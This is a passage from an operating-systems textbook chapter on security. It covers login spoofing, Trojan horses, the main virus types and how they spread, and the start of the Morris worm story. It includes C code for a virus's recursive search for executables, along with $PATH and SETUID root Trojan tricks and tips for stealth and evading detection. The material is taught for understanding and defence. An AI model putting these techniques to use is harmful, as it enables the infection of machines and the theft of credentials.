check each other's code is also a possibility.
9.8.3 Login Spoofing
     In this insider attack, the perpetrator is a legitimate user who is attempting to
collect other people's passwords through a technique called login spoofing.            It is
typically employed in organizations with many public computers on a LAN used
by multiple users. Many universities, for example, have rooms full of computers
where students can log onto any computer.       It works like this.  Normally, when no
one is logged in on a UNIX computer, a screen similar to that of Fig. 9-27(a) is dis-
played. When a user sits down and types a login name, the system asks for a pass-
word.  If it is correct, the user is logged in and a shell (and possibly a GUI) is start-
ed.
          Login:                                   Login:
          (a)                                      (b)
          Figure 9-27. (a) Correct login screen. (b) Phony login screen.
     Now consider this scenario.  A malicious user, Mal, writes a program to dis-
play the screen of Fig. 9-27(b).  It looks amazingly like the screen of Fig. 9-27(a),
except that this is not the system login program running, but a phony one written
by Mal. Mal now starts up his phony login program and walks away to watch the
fun from a safe distance. When a user sits down and types a login name, the pro-
gram responds by asking for a password and disabling echoing. After the login
name and password have been collected, they are written away to a file and the
phony login program sends a signal to kill its shell. This action logs Mal out and



660                            SECURITY                                         CHAP. 9
triggers the real login program to start and display the prompt of Fig. 9-27(a). The
user assumes that she made a typing error and just logs in again. This time, how-
ever, it works.  But in the meantime, Mal has acquired another (login name, pass-
word) pair.  By logging in at many computers and starting the login spoofer on all
of them, he can collect many passwords.
     The only real way to prevent this is to have the login sequence start with a key
combination that user programs cannot catch. Windows uses CTRL-ALT-DEL for
this purpose. If a user sits down at a computer and starts out by first typing CTRL-
ALT-DEL, the current user is logged out and the system login program is started.
There is no way to bypass this mechanism.
9.9 MALWARE
     In ancient times (say, before 2000), bored (but clever) teenagers would some-
times fill their idle hours by writing malicious software that they would then re-
lease into the world for the heck of it. This software, which included Trojan horses,
viruses, and worms and collectively called malware, often quickly spread around
the world.   As reports were published about how many millions of dollars of dam-
age the malware caused and how many people lost their valuable data as a result,
the authors would be very impressed with their programming skills.       To them it
was just a fun prank; they were not making any money off it, after all.
     Those days are gone. Malware is now written on demand by well-organized
criminals who prefer not to see their work publicized in the newspapers. They are
in it entirely for the money.  A large fraction of all malware is now designed to
spread over the Internet and infect victim machines in an extremely stealthy man-
ner. When a machine is infected, software is installed that reports the address of the
captured machine back to certain machines.  A backdoor is also installed on the
machine that allows the criminals who sent out the malware to easily command the
machine to do what it is instructed to do.  A machine taken over in this fashion is
called a zombie, and a collection of them is called a botnet, a contraction of
``robot network.''
     A criminal who controls a botnet can rent it out for various nefarious (and al-
ways commercial) purposes. A common one is for sending out commercial spam.
If a major spam attack occurs and the police try to track down the origin, all they
see is that it is coming from thousands of machines all over the world.  If they ap-
proach some of the owners of these machines, they will discover kids, small busi-
ness owners, housewives, grandmothers, and many other people, all of whom vig-
orously deny that they are mass spammers.   Using other people's machines to do
the dirty work makes it hard to track down the criminals behind the operation.
     Once installed, malware can also be used for other criminal purposes. Black-
mail is a possibility.  Imagine a piece of malware that encrypts all the files on the
victim's hard disk, then displays the following message:



SEC. 9.9                             MALWARE                                           661
                   GREETINGS FROM GENERAL ENCRYPTION!
TO PURCHASE A DECRYPTION KEY FOR YOUR HARD DISK, PLEASE SEND $100 IN
SMALL, UNMARKED BILLS TO BOX 2154, PANAMA CITY, PANAMA.  THANK YOU. WE
APPRECIATE YOUR BUSINESS.
Another common application of malware has it install a keylogger on the infected
machine. This program simply records all keystrokes typed in and periodically
sends them to some machine or sequence of machines (including zombies) for ulti-
mate delivery to the criminal. Getting the Internet provider servicing the delivery
machine to cooperate in an investigation is often difficult since many of these are
in cahoots with (or sometimes owned by) the criminal, especially in countries
where corruption is common.
The gold to be mined in these keystrokes consists of credit card numbers,
which can be used to buy goods from legitimate businesses. Since the victims have
no idea their credit card numbers have been stolen until they get their statements at
the end of the billing cycle, the criminals can go on a spending spree for days, pos-
sibly even weeks.
To guard against these attacks, the credit card companies all use artificial intel-
ligence software to detect peculiar spending patterns. For example, if a person who
normally only uses his credit card in local stores suddenly orders a dozen expen-
sive notebook computers to be delivered to an address in, say, Tajikistan, a bell
starts ringing at the credit card company and an employee typically calls the card-
holder to politely inquire about the transaction.  Of course, the criminals know
about this software, so they try to fine-tune their spending habits to stay (just)
under the radar.
The data collected by the keylogger can be combined with other data collected
by software installed on the zombie to allow the criminal to engage in a more
extensive identity theft.  In this crime, the criminal collects enough data about a
person, such as date of birth, mother's maiden name, social security number, bank
account numbers, passwords, and so on, to be able to successfully impersonate the
victim and get new physical documents, such as a replacement driver's license,
bank debit card, birth certificate, and more. These, in turn, can be sold to other
criminals for further exploitation.
Another form of crime that some malware commits is to lie low until the user
correctly logs into his Internet banking account. Then it quickly runs a transaction
to see how much money is in the account and immediately transfers all of it to the
criminal's account, from which it is immediately transferred to another account
and then another and another (all in different corrupt countries) so that the police
need days or weeks to collect all the search warrants they need to follow the money
and which may not be honored even if they do get them. These kinds of crimes are
big business; it is not pesky teenagers any more.
In addition to its use by organized crime, malware also has industrial applica-
tions.  A company could release a piece of malware that checked if it was running



662                                 SECURITY                               CHAP. 9
at a competitor's factory and with no system administrator currently logged in.        If
the coast was clear, it would interfere with the production process, reducing prod-
uct quality, thus causing trouble for the competitor.  In all other cases it would do
nothing, making it hard to detect.
       Another example of targeted malware is a program that could be written by an
ambitious corporate vice president and released onto the local LAN.        The virus
would check if it was running on the president's machine, and if so, go find a
spreadsheet and swap two random cells. Sooner or later the president would make
a bad decision based on the spreadsheet output and perhaps get fired as a result,
opening up a position for you-know-who.
       Some people walk around all day with a chip on their shoulder (not to be con-
fused with people with an RFID chip in their shoulder).      They have some real or
imagined grudge against the world and want to get even. Malware can help.        Many
modern computers hold the BIOS in flash memory, which can be rewritten under
program control (to allow the manufacturer to distribute bug fixes electronically).
Malware can write random junk in the flash memory so that the computer will no
longer boot.  If the flash memory chip is in a socket, fixing the problem requires
opening up the computer and replacing the chip.        If the flash memory chip is sol-
dered to the parentboard, probably the whole board has to be thrown out and a new
one purchased.
       We could go on and on, but you probably get the point. If you want more hor-
ror stories, just type malware to any search engine. You will get tens of millions of
hits.
       A question many people ask is: ``Why does malware spread so easily?'' There
are several reasons. First, something like 90% of the world's personal computers
run (versions of) a single operating system, Windows, which makes an easy target.
If there were 10 operating systems out there, each with 10% of the market, spread-
ing malware would be vastly harder. As in the biological world, diversity is a good
defense.
       Second, from its earliest days, Microsoft has put a lot of emphasis on making
Windows easy to use by nontechnical people. For example, in the past Windows
systems were normally configured to allow login without a password, whereas
UNIX systems historically always required a password (although this excellent
practice is weakening as Linux tries to become more like Windows).   In numerous
other ways there are trade-offs between good security and ease of use, and Micro-
soft has consistently chosen ease of use as a marketing strategy. If you think secu-
rity is more important than ease of use, stop reading now and go configure your
cell phone to require a PIN code before it will make a call--nearly all of them are
capable of this.  If you do not know how, just download the user manual from the
manufacturer's Website. Got the message?
       In the next few sections we will look at some of the more common forms of
malware, how they are constructed, and how they spread. Later in the chapter we
will examine some of the ways they can be defended against.



SEC. 9.9                                 MALWARE                                        663
9.9.1 Trojan Horses
Writing malware is one thing. You can do it in your bedroom. Getting millions
of people to install it on their computers is quite something else. How would our
malware writer, Mal, go about this? A very common practice is to write some gen-
uinely useful program and embed the malware inside of it. Games, music players,
``special'' porno viewers, and anything with splashy graphics are likely candidates.
People will then voluntarily download and install the application.  As a free bonus,
they get the malware installed, too. This approach is called a Trojan horse attack,
after the wooden horse full of Greek soldiers described in Homer's Odyssey. In the
computer security world, it has come to mean any malware hidden in software or a
Web page that people voluntarily download.
When the free program is started, it calls a function that writes the malware to
disk as an executable program and starts it. The malware can then do whatever
damage it was designed for, such as deleting, modifying, or encrypting files. It can
also search for credit card numbers, passwords, and other useful data and send
them back to Mal over the Internet. More likely, it attaches itself to some IP port
and waits there for directions, making the machine a zombie, ready to send spam
or do whatever its remote master wishes. Usually, the malware will also invoke the
commands necessary to make sure the malware is restarted whenever the machine
is rebooted. All operating systems have a way to do this.
The beauty of the Trojan horse attack is that it does not require the author of
the Trojan horse to break into the victim's computer. The victim does all the work.
There are also other ways to trick the victim into executing the Trojan horse
program. For example, many UNIX users have an environment variable, $PATH,
which controls which directories are searched for a command.        It can be viewed by
typing the following command to the shell:
echo $PATH
A potential setting for the user ast on a particular system might consist of the fol-
lowing directories:
:/usr/ast/bin:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/ucb:/usr/man\
:/usr/java/bin:/usr/java/lib:/usr/local/man:/usr/openwin/man
Other users are likely to have a different search path. When the user types
prog
to the shell, the shell first checks to see if there is a program at the location
/usr/ast/bin/prog.   If  there  is,  it  is  executed.  If it is not there, the shell tries
/usr/local/bin/prog, /usr/bin/prog, /bin/prog, and so on, trying all 10 directories in
turn before giving up. Suppose that just one of these directories was left unprotect-
ed and a cracker put a program there.        If this is the first occurrence of the program
in the list, it will be executed and the Trojan horse will run.



664                                    SECURITY                            CHAP. 9
     Most common programs are in /bin or /usr/bin, so putting a Trojan horse in
/usr/bin/X11/ls does not work for a common program because the real one will be
found first. However, suppose the cracker inserts la into /usr/bin/X11.    If a user
mistypes la instead of ls (the directory listing program), now the Trojan horse will
run, do its dirty work, and then issue the correct message that la does not exist. By
inserting Trojan horses into complicated directories that hardly anyone ever looks
at and giving them names that could represent common typing errors, there is a fair
chance that someone will invoke one of them sooner or later. And that someone
might be the superuser (even superusers make typing errors), in which case the
Trojan horse now has the opportunity to replace /bin/ls with a version containing a
Trojan horse, so it will be invoked all the time now.
     Our malicious but legal user, Mal, could also lay a trap for the superuser as fol-
lows.    He puts a version of ls containing a Trojan horse in his own directory and
then does something suspicious that is sure to attract the superuser's attention, such
as starting up 100 compute-bound processes at once. Chances are the superuser
will check that out by typing
     cd  /home/mal
     ls  l
to see what Mal has in his home directory. Since some shells first try the local di-
rectory before working through $PATH, the superuser may have just invoked Mal's
Trojan horse with superuser power and bingo. The Trojan horse could then make
/home/mal/bin/sh SETUID root.  All it takes is two system calls: chown to change
the owner of /home/mal/bin/sh to root and chmod to set its SETUID bit. Now Mal
can become superuser at will by just running that shell.
     If Mal finds himself frequently short of cash, he might use one of the following
Trojan horse scams to help his liquidity position.     In the first one, the Trojan horse
checks to see if the victim has an online banking program installed. If so, the Tro-
jan horse directs the program to transfer some money from the victim's account to
a dummy account (preferably in a far-away country) for collection in cash later.
Likewise, if the Trojan runs on a mobile phone (smart or not), the Trojan horse
may also send text messages to really expensive toll numbers, preferably again in a
far-away country, such as Moldova (part of the former Soviet Union).
9.9.2 Viruses
     In this section we will examine viruses; after it, we turn to worms.  Also, the
Internet is full of information about viruses, so the genie is already out of the bot-
tle. In addition, it is hard for people to defend themselves against viruses if they do
not know how they work. Finally, there are a lot of misconceptions about viruses
floating around that need correction.
     What is a virus, anyway?  To make a long story short, a virus is a program that
can reproduce itself by attaching its code to another program, analogous to how



SEC. 9.9                              MALWARE                                           665
biological viruses reproduce.    The virus can also do other things in addition to
reproducing itself. Worms are like viruses but are self replicating.  That difference
will not concern us for the moment, so we will use the term ``virus'' to cover both.
We will look at worms in Sec. 9.9.3.
How Viruses Work
Let us now see what kinds of viruses there are and how they work. The virus
writer, let us call him Virgil, probably works in assembler (or maybe C) to get a
small, efficient product. After he has written his virus, he inserts it into a program
on his own machine. That infected program is then distributed, perhaps by posting
it to a free software collection on the Internet. The program could be an exciting
new game, a pirated version of some commercial software, or anything else likely
to be considered desirable. People then begin to download the infected program.
Once installed on the victim's machine, the virus lies dormant until the infect-
ed program is executed. Once started, it usually begins by infecting other programs
on the machine and then executing its payload.          In many cases, the payload may
do nothing until a certain date has passed to make sure that the virus is widespread
before people begin noticing it. The date chosen might even send a political mes-
sage (e.g., if it triggers on the 100th or 500th anniversary of some grave insult to
the author's ethnic group).
In the discussion below, we will examine seven kinds of viruses based on what
is infected. These are companion, executable program, memory, boot sector, device
driver, macro, and source code viruses.  No doubt new types will appear in the fu-
ture.
Companion Viruses
A companion virus does not actually infect a program, but gets to run when
the program is supposed to run.  They are really old, going back to the days when
MS-DOS ruled the earth but they still exist. The concept is easiest to explain with
an example. In MS-DOS when a user types
prog
MS-DOS first looks for a program named prog.com.        If it cannot find one, it looks
for a program named prog.exe. In Windows, when the user clicks on Start and then
Run (or presses the Windows key and then ``R''), the same thing happens. Now-
adays, most programs are .exe files; .com files are very rare.
Suppose that Virgil knows that many people run prog.exe from an MS-DOS
prompt or from Run on Windows.           He can then simply release a virus called
prog.com, which will get executed when anyone tries to run prog (unless he ac-
tually types the full name: prog.exe). When prog.com has finished its work, it then
just executes prog.exe and the user is none the wiser.



666                                            SECURITY                                        CHAP. 9
     A somewhat related attack uses the Windows desktop, which contains short-
cuts (symbolic links) to programs.             A virus can change the target of a shortcut to
make it point to the virus. When the user double clicks on an icon, the virus is ex-
ecuted. When it is done, the virus just runs the original target program.
Executable Program Viruses
     One step up in complexity are viruses that infect executable programs. The
simplest of this type just overwrites the executable program with itself. These are
called  overwriting        viruses.       The  infection  logic  of   such       a  virus  is  given  in
Fig. 9-28.
#include <sys/types.h>                               /* standard POSIX headers */
#include <sys/stat.h>
#include <dirent.h>
#include <fcntl.h>
#include <unistd.h>
struct stat sbuf;                                    /* for lstat call to see if file is sym link */
search(char *dir    name)
{                                                    /* recursively search for executables */
     DIR *dirp;                                      /* pointer to an open directory stream */
     struct dirent *dp;                              /* pointer to a directory entry */
     dirp = opendir(dir    name);                    /* open this directory */
     if (dirp == NULL) return;                       /* dir could not be opened; forget it */
     while (TRUE) {
            dp = readdir(dirp);                      /* read next directory entry */
            if (dp == NULL) {                        /* NULL means we are done */
            chdir ("..");                            /* go back to parent directory */
            break;                                   /* exit loop */
     }
     if (dp->d     name[0] == '.') continue;         /* skip the . and .. directories */
     lstat(dp->d    name, &sbuf);                    /* is entry a symbolic link? */
     if (S  ISLNK(sbuf.st     mode)) continue;       /* skip symbolic links */
     if (chdir(dp->d       name) == 0) {             /* if chdir succeeds, it must be a dir */
            search(".");                             /* yes, enter and search it */
     } else {                                        /* no (file), infect it */
            if (access(dp->d     name,X   OK) == 0)  /* if executable, infect it */
                   infect(dp->d  name);
     }
     closedir(dirp);                                 /* dir processed; close and return */
}
        Figure 9-28. A recursive procedure that finds executable files on a UNIX system.
     The main program of this virus would first copy its binary program into an
array by opening argv[0] and reading it in for safekeeping. Then it would traverse



SEC. 9.9                           MALWARE                                                   667
the entire file system starting at the root directory by changing to the root directory
and calling search with the root directory as parameter.
The recursive procedure search processes a directory by opening it, then read-
ing the entries one at a time using readdir until a NULL is returned, indicating that
there are no more entries. If the entry is a directory, it is processed by changing to
it and then calling search recursively; if it is an executable file, it is infected by cal-
ling infect with the name of the file to infect as parameter. Files starting with ``.''
are skipped to avoid problems with the . and .. directories. Also, symbolic links are
skipped because the program assumes that it can enter a directory using the chdir
system call and then get back to where it was by going to .. , something that holds
for hard links but not symbolic links.  A fancier program could handle symbolic
links, too.
The actual infection procedure, infect (not shown), merely has to open the file
named in its parameter, copy the virus saved in the array over the file, and then
close the file.
This virus could be ``improved'' in various ways. First, a test could be inserted
into infect to generate a random number and just return in most cases without
doing anything.  In, say, one call out of 128, infection would take place, thereby
reducing the chances of early detection, before the virus has had a good chance to
spread. Biological viruses have the same property: those that kill their victims
quickly do not spread nearly as fast as those that produce a slow, lingering death,
giving the victims plenty of chance to spread the virus.    An alternative design
would be to have a higher infection rate (say, 25%) but a cutoff on the number of
files infected at once to reduce disk activity and thus be less conspicuous.
Second, infect could check to see if the file is already infected. Infecting the
same file twice just wastes time.  Third, measures could be taken to keep the time
of last modification and file size the same as it was to help hide the infection. For
programs larger than the virus, the size will remain unchanged, but for programs
smaller than the virus, the program will now be bigger. Since most viruses are
smaller than most programs, this is not a serious problem.
Although this program is not very long (the full program is under one page of
C and the text segment compiles to under 2 KB), an assembly-code version of it
can be even shorter. Ludwig (1998) gives an assembly-code program for MS-DOS
that infects all the files in its directory and is only 44 bytes when assembled.
Later in this chapter we will study antivirus programs, that is, programs that
track down and remove viruses.     It is interesting to note here that the logic of
Fig. 9-28, which a virus could use to find all the executable files to infect them,
could also be used by an antivirus program to track down all the infected programs
in order to remove the virus. The technologies of infection and disinfection go
hand in hand, which is why it is necessary to understand in detail how viruses work
in order to be able to fight them effectively.
From Virgil's point of view, the problem with an overwriting virus is that it is
too easy to detect. After all, when an infected program executes, it may spread the



668                          SECURITY                                                      CHAP. 9
virus some more, but it does not do what it is supposed to do, and the user will no-
tice this instantly. Consequently, many viruses attach themselves to the program
and do their dirty work, but allow the program to function normally afterward.
Such viruses are called parasitic viruses.
     Parasitic viruses can attach themselves to the front, the back, or the middle of
the executable program. If a virus attaches itself to the front, it has to first copy the
program to RAM, put itself on the front, and then copy the program back from
RAM following itself, as shown in Fig. 9-29(b).          Unfortunately, the program will
not run at its new virtual address, so the virus has to either relocate the program as
it is moved or move it to virtual address 0 after finishing its own execution.
                                                         Virus
                             Executable                                             Virus
                             program                                                Virus
                 Executable                       Executable
                 program                                 program                    Virus
     Starting                Virus                                                  Virus
     address
                 Header      Header                      Header   Header
                 (a)         (b)                         (c)                        (d)
     Figure 9-29. (a) An executable program. (b) With a virus at the front. (c) With       a
     virus at the end. (d) With a virus spread over free space within the program.
     To avoid either of the complex options required by these front loaders, most vi-
ruses are back loaders, attaching themselves to the end of the executable program
instead of the front, changing the starting address field in the header to point to the
start of the virus, as illustrated in Fig. 9-29(c). The virus will now execute at a dif-
ferent virtual address depending on which infected program is running, but all this
means is that Virgil has to make sure his virus is position independent, using rela-
tive instead of absolute addresses. That is not hard for an experienced programmer
to do and some compilers can do it upon request.
     Complex executable program formats, such as .exe files on Windows and
nearly all modern UNIX binary formats, allow a program to have multiple text and
data segments, with the loader assembling them in memory and doing relocation
on the fly.  In some systems (Windows, for example), all segments (sections) are
multiples of 512 bytes.   If a segment is not full, the linker fills it out with 0s.          A
virus that understands this can try to hide itself in the holes.  If it fits entirely, as in
Fig. 9-29(d), the file size remains the same as that of the uninfected file, clearly a
plus, since a hidden virus is a happy virus. Viruses that use this principle are called
cavity viruses.  Of course, if the loader does not load the cavity areas into memo-
ry, the virus will need another way of getting started.



SEC. 9.9                          MALWARE                                                 669
Memory-Resident Viruses
So far we have assumed that when an infected program is executed, the virus
runs, passes control to the real program, and then exits.   In contrast, a memory-
resident virus stays in memory (RAM) all the time, either hiding at the very top of
memory or perhaps down in the grass among the interrupt vectors, the last few
hundred bytes of which are generally unused. A very smart virus can even modify
the operating system's RAM bitmap to make the system think the virus' memory is
occupied, to avoid the embarrassment of being overwritten.
A typical memory-resident virus captures one of the trap or interrupt vectors
by copying the contents to a scratch variable and putting its own address there, thus
directing that trap or interrupt to it. The best choice is the system call trap.  In that
way, the virus gets to run (in kernel mode) on every system call. When it is done, it
just invokes the real system call by jumping to the saved trap address.
Why would a virus want to run on every system call? To infect programs, nat-
urally. The virus can just wait until an exec system call comes along, and then,
knowing that the file at hand is an executable binary (and probably a useful one at
that), infect it. This process does not require the massive disk activity of Fig. 9-28,
so it is far less conspicuous. Catching all system calls also gives the virus great po-
tential for spying on data and performing all manner of mischief.
Boot Sector Viruses
As we discussed in Chap. 5, when most computers are turned on, the BIOS
reads the master boot record from the start of the boot disk into RAM and executes
it. This program determines which partition is active and reads in the first sector,
the boot sector, from that partition and executes it. That program then either loads
the operating system or brings in a loader to load the operating system. Unfortun-
ately, many years ago one of Virgil's friends got the idea of creating a virus that
could overwrite the master boot record or the boot sector, with devastating results.
Such viruses, called boot sector viruses, are still very common.
Normally, a boot sector virus [which includes MBR (Master Boot Record) vi-
ruses] first copies the true boot sector to a safe place on the disk so that it can boot
the operating system when it is finished. The Microsoft disk formatting program,
fdisk, skips the first track, so that is a good hiding place on Windows machines.
Another option is to use any free disk sector and then update the bad-sector list to
mark the hideout as defective.    In fact, if the virus is large, it can also disguise the
rest of itself as bad sectors. A really aggressive virus could even just allocate nor-
mal disk space for the true boot sector and itself, and update the disk's bitmap or
free list accordingly. Doing this requires an intimate knowledge of the operating
system's internal data structures, but Virgil had a good professor for his operating
systems course and studied hard.



670                        SECURITY                                                       CHAP. 9
     When the computer is booted, the virus copies itself to RAM, either at the top
or down among the unused interrupt vectors. At this point the machine is in kernel
mode, with the MMU off, no operating system, and no antivirus program running.
Party time for viruses.    When it is ready, it boots the operating system, usually
staying memory resident so it can keep an eye on things.
     One problem, however, is how to get control again later. The usual way is to
exploit specific knowledge of how the operating system manages the interrupt vec-
tors. For example, Windows does not overwrite all the interrupt vectors in one
blow. Instead, it loads device drivers one at a time, and each one captures the inter-
rupt vector it needs. This process can take a minute.
     This design gives the virus the handle it needs to get going.                      It starts out by
capturing all the interrupt vectors, as shown in Fig. 9-30(a).  As drivers load, some
of the vectors are overwritten, but unless the clock driver is loaded first, there will
be plenty of clock interrupts later that start the virus. Loss of the printer interrupt is
shown in Fig. 9-30(b).     As soon as the virus sees that one of its interrupt vectors
has been overwritten, it can overwrite that vector again, knowing that it is now safe
(actually, some interrupt vectors are overwritten several times during booting, but
the pattern is deterministic and Virgil knows it by heart).     Recapture of the printer
is shown in Fig. 9-30(c).  When everything is loaded, the virus restores all the in-
terrupt vectors and keeps only the system-call trap vector for itself.                  At this point
we have a memory-resident virus in control of system calls.         In fact, this is how
most memory-resident viruses get started in life.
     Operating             Operating                                           Operating
     system                system                                              system
     Virus                 Virus                                               Virus
     Sys call traps        Sys call traps                       Sys call traps
     Disk vector           Disk vector                              Disk vector
     Clock vector          Clock vector                         Clock vector
     Printer vector        Printer vector                       Printer vector
     (a)                   (b)                                                 (c)
     Figure 9-30. (a) After the virus has captured all the interrupt and trap vectors.
     (b) After the operating system has retaken the printer interrupt vector.           (c) After
     the virus has noticed the loss of the printer interrupt vector and recaptured it.



SEC. 9.9                     MALWARE                                                      671
Device Driver Viruses
Getting into memory like this is a little like spelunking (exploring caves)--you
have to go through contortions and keep worrying about something falling down
and landing on your head.    It would be much simpler if the operating system would
just kindly load the virus officially. With a little bit of work, that goal can be
achieved right off the bat.  The trick is to infect a device driver, leading to a device
driver virus.    In Windows and some UNIX systems, device drivers are just ex-
ecutable programs that live on the disk and are loaded at boot time. If one of them
can be infected, the virus will always be officially loaded at boot time. Even nicer,
drivers run in kernel mode, and after a driver is loaded, it is called, giving the virus
a chance to capture the system-call trap vector. This fact alone is actually a strong
argument for running the device drivers as user-mode programs (as MINIX 3
does)--because if they get infected, they cannot do nearly as much damage as ker-
nel-mode drivers.
Macro Viruses
Many programs, such as Word and Excel, allow users to write macros to group
several commands that can later be executed with a single keystroke. Macros can
also be attached to menu items, so that when one of them is selected, the macro is
executed. In Microsoft Office, macros can contain entire programs in Visual Basic,
which is a complete programming language. The macros are interpreted rather than
compiled, but that affects only execution speed, not what they can do. Since
macros may be document specific, Office stores the macros for each document
along with the document.
Now comes the problem. Virgil writes a document in Word and creates a macro
that he attaches to the OPEN FILE function. The macro contains a macro virus.
He then emails the document to the victim, who naturally opens it (assuming the
email program has not already done this for him).  Opening the document causes
the OPEN FILE macro to execute. Since the macro can contain an arbitrary pro-
gram, it can do anything, such as infect other Word documents, erase files, and
more.  In all fairness to Microsoft, Word does give a warning when opening a file
with macros, but most users do not understand what this means and continue open-
ing anyway. Besides, legitimate documents may also contain macros.  And there
are other programs that do not even give this warning, making it even harder to
detect a virus.
With the growth of email attachments, sending documents with viruses embed-
ded in macros is easy. Such viruses are much easier to write than concealing the
true boot sector somewhere in the bad-block list, hiding the virus among the inter-
rupt vectors, and capturing the system-call trap vector. This means that increasing-
ly less skilled people can now write viruses, lowering the general quality of the
product and giving virus writers a bad name.



672                                        SECURITY                              CHAP. 9
Source Code Viruses
     Parasitic and boot sector viruses are highly platform specific; document viruses
are somewhat less so (Word runs on Windows and Macs, but not on UNIX).                   The
most  portable      viruses  of  all  are  source  code  viruses.  Imagine  the  virus      of
Fig. 9-28, but with the modification that instead of looking for binary executable
files, it looks for C programs, a change of only 1 line (the call to access).            The
infect procedure should be changed to insert the line
     #include <virus.h>
at the top of each C source program. One other insertion is needed, the line
     run virus( );
to activate the virus. Deciding where to put this line requires some ability to parse
C code, since it must be at a place that syntactically allows procedure calls and also
not at a place where the code would be dead (e.g., following a return statement).
Putting it in the middle of a comment does not work either, and putting it inside a
loop might be too much of a good thing. Assuming the call can be placed properly
(e.g., just before the end of main or before the return statement if there is one),
when the program is compiled, it now contains the virus, taken from virus.h (al-
though proj.h might attract less attention should somebody see it).
     When the program runs, the virus will be called. The virus can do anything it
wants to, for example, look for other C programs to infect. If it finds one, it can in-
clude just the two lines given above, but this will work only on the local machine,
where virus.h is assumed to be installed already.        To have this work on a remote
machine, the full source code of the virus must be included. This can be done by
including the source code of the virus as an initialized character string, preferably
as a list of 32-bit hexadecimal integers to prevent anyone from figuring out what it
does. This string will probably be fairly long, but with today's multimegaline code,
it might easily slip by.
     To the uninitiated reader, all of these ways may look fairly complicated. One
can legitimately wonder if they could be made to work in practice.          They can be.
Believe us. Virgil is an excellent programmer and has a lot of free time on his
hands. Check your local newspaper for proof.
How Viruses Spread
     There are several scenarios for distribution. Let us start with the classical one.
Virgil writes his virus, inserts it into some program he has written (or stolen), and
starts distributing the program, for example, by putting it on a shareware Website.
Eventually, somebody downloads the program and runs it.            At this point there are
several options.    To start with, the virus probably infects more files on the disk, just
in case the victim decides to share some of these with a friend later. It can also try



SEC. 9.9                          MALWARE                                                 673
to infect the boot sector of the hard disk. Once the boot sector is infected, it is easy
to start a kernel-mode memory-resident virus on subsequent boots.
Nowadays, other options are also available to Virgil. The virus can be written
to check if the infected machine is on a (wireless) LAN, something that is very
likely. The virus can then start infecting unprotected files on all the machines con-
nected to the LAN. This infection will not extend to protected files, but that can be
dealt with by making infected programs act strangely. A user who runs such a pro-
gram will likely ask the system administrator for help. The administrator will then
try out the strange program himself to see what is going on.       If the administrator
does this while logged in as superuser, the virus can now infect the system binaries,
device drivers, operating system, and boot sectors. All it takes is one mistake like
this and all the machines on the LAN are compromised.
Machines on a company LAN often have authorization to log onto remote ma-
chines over the Internet or a private network, or even authorization to execute com-
mands remotely without logging in. This ability provides more opportunity for vi-
ruses to spread.  Thus one innocent mistake can infect the entire company.  To pre-
vent this scenario, all companies should have a general policy telling administra-
tors never to make mistakes.
Another way to spread a virus is to post an infected program to a USENET
(i.e., Google) newsgroup or Website to which programs are regularly posted. Also
possible is to create a Web page that requires a special browser plug-in to view, and
then make sure the plug-ins are infected.
A different attack is to infect a document and then email it to many people or
broadcast it to a mailing list or USENET newsgroup, usually as an attachment.
Even people who would never dream of running a program some stranger sent
them might not realize that clicking on the attachment to open it can release a virus
on their machine. To make matters worse, the virus can then look for the user's ad-
dress book and then mail itself to everyone in the address book, usually with a
Subject line that looks legitimate or interesting, like
Subject: Change of plans
Subject: Re: that last email
Subject: The dog died last night
Subject: I am seriously ill
Subject: I love you
When the email arrives, the receiver sees that the sender is a friend or colleague,
and thus does not suspect trouble. Once the email has been opened, it is too late.
The ``I LOVE YOU'' virus that spread around the world in June 2000 worked this
way and did a billion dollars worth of damage.
Somewhat related to the actual spreading of active viruses is the spreading of
virus technology. There are groups of virus writers who actively communicate over
the Internet and help each other develop new technology, tools, and viruses. Most
of them are probably hobbyists rather than career criminals, but the effects can be



674                                    SECURITY                                  CHAP. 9
just as devastating. Another category of virus writers is the military, which sees vi-
ruses as a weapon of war potentially able to disable an enemy's computers.
     Another issue related to spreading viruses is avoiding detection. Jails have
notoriously bad computing facilities, so Virgil would prefer avoiding them.       Post-
ing a virus from his home machine is not a wise idea.        If the attack is successful,
the  police  might   track  him  down  by  looking   for  the  virus  message    with       the
youngest timestamp, since that is probably closest to the source of the attack.
     To minimize his exposure, Virgil might go to an Internet cafe in a distant city
and log in there.    He can either bring the virus on a USB stick and read it in him-
self, or if the machines do not have USB ports, ask the nice young lady at the desk
to please read in the file book.doc so he can print it. Once it is on his hard disk, he
renames the file virus.exe and executes it, infecting the entire LAN with a virus
that triggers a month later, just in case the police decide to ask the airlines for a list
of all people who flew in that week.
     An alternative is to forget the USB stick and fetch the virus from a remote Web
or FTP site. Or bring a notebook and plug it in to an Ethernet port that the Internet
cafe has thoughtfully provided for notebook-toting tourists who want to read their
email every day. Once connected to the LAN, Virgil can set out to infect all of the
machines on it.
     There is a lot more to be said about viruses.   In particular how they try to hide
and how antivirus software tries to flush them out.  They can even hide inside live
animals--really--see Rieback et al. (2006).         We will come back to these topics
when we get into defenses against malware later in this chapter.
9.9.3 Worms
     The first large-scale Internet computer security violation began in the evening
of Nov. 2, 1988, when a Cornell graduate student, Robert Tappan Morris, released
a worm program into the Internet. This action brought down thousands of com-
puters at universities, corporations, and government laboratories all over the world
before it was tracked down and removed.       It also started a controversy that has not
yet died down. We will discuss the highlights of this event below. For more techni-
cal information see the paper by Spafford et al. (1989).       For the story viewed as a
police thriller, see the book by Hafner and Markoff (1991).
     The  story  began  sometime  in   1988,  when   Morris    discovered  two    bugs      in
Berkeley UNIX that made it possible to gain unauthorized access to machines all
over the Internet. As we shall see, one of them was a buffer overflow. Working all
alone, he wrote a self-replicating program, called a worm, that would exploit these
errors and replicate itself in seconds on every machine it could gain access to.            He
worked on the program for months, carefully tuning it and having it try to hide its
tracks.
     It is not known whether the release on Nov. 2, 1988, was intended as a test, or
was the real thing.  In any event, it did bring most of the Sun and VAX systems on



SEC. 9.9                  MALWARE                                                        675
the Internet to their knees within a few hours of its release. Morris' motivation is
unknown, but it is possible that he intended the whole idea as a high-tech practical
joke, but which due to a programming error got completely out of hand.
Technically, the worm consisted of two programs, the bootstrap and the worm
proper. The bootstrap was 99 lines of C called l1.c.  It was compiled and executed
on the system under attack. Once running, it connected to the machine from which
it came, uploaded the main worm, and executed it. After going to some trouble to
hide its existence, the worm then looked through its new host's routing tables to
see what machines that host was connected to and attempted to spread the boot-
strap to those machines.
Three methods were tried to infect new machines. Method 1 was to try to run a
remote shell using the rsh command. Some machines trust other machines, and just
